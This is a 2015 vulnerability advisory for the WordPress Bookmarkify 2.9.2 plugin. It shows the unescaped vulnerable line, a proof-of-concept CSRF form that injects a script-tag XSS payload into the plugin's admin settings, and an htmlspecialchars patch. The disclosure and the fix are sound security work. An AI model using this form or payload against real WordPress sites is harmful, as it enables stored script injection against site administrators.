Home / os / winmobile

WordPress Bookmarkify 2.9.2 Cross Site Request Forgery / Cross Site Scripting

Posted on 09 August 2015

###################### # Exploit Title : Wordpress Bookmarkify Plug-in XSS/CSRF # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/bookmarkify/ # Date: 2015-08-07 # Tested On : Kali Linux - FireFox # Software Link : https://downloads.wordpress.org/plugin/bookmarkify.zip # Version : 2.9.2 ###################### # Vulnerable Code: File: bookmarkify.php - Line 906 <input id="WidgetTitle" name="WidgetTitle" type="text" value="<?php echo $widgetTitle; ?>" size="35"> ###################### # Exploit: <form method="post" action="http://[URL]/[Path]/wp-admin/options-general.php?page=bookmarkify.php"> <input id="WidgetTitle" name="WidgetTitle" type="hidden" value='"><script>alert(/Mahdi.Hidden/)</script>"'> <input name="BookmarkifyUpdate" type="submit" value="Update Options &raquo;"> </form> ###################### # Patch: File: bookmarkify.php - Line 906 <input id="WidgetTitle" name="WidgetTitle" type="text" value="<?php echo htmlspecialchars($widgetTitle); ?>" size="35"> ###################### # Discovered By : Mahdi.Hidden ######################

 

TOP